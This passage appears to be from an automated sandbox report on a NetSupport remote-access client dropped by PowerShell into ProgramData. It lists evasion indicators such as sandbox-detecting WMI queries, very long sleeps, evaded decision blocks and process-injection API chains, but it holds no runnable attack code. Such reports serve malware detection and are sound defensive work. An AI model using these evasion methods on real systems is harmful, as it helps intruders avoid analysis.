                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Contains functionality to detect sleep reduction / modifications
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEB91F032_2_6BEB91F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC4F3032_2_6BEC4F30
                                    Delayed program exit found
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110B7290 Sleep,ExitProcess,32_2_110B7290
                                    Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899888Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899776Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899664Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899552Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899440Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899312Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899200Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7678Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2187Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1859Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7949Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1654Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8173Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1945
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2502
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 882
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 480
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\AudioCapture.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\TCCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\remcmdstub.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\HTCTL32.DLLJump to dropped file
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-96141
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-98237
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-101586
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-101973
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-102223
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_32-101718
                                    Source: C:\ProgramData\netsupport\client\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_32-98042
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI coverage: 6.3 %
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC4F3032_2_6BEC4F30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 1859 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 7949 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 1654 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep count: 8173 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -900000s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899888s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899776s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899664s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899552s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899440s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899312s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899200s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 1945 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep count: 2502 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 882 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 480 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                    Source: C:\ProgramData\netsupport\client\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ProgramData\netsupport\client\client32.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6BEC3226h32_2_6BEC3130
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,32_2_11069760
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,32_2_11123690
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,32_2_11108090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,32_2_110BC0E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,32_2_11064EF0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF53778 GetSystemInfo,25_2_00007FF9BAF53778
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899888Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899776Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899664Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899552Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899440Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899312Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899200Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: HTCTL32.DLL.26.drBinary or memory string: VMware
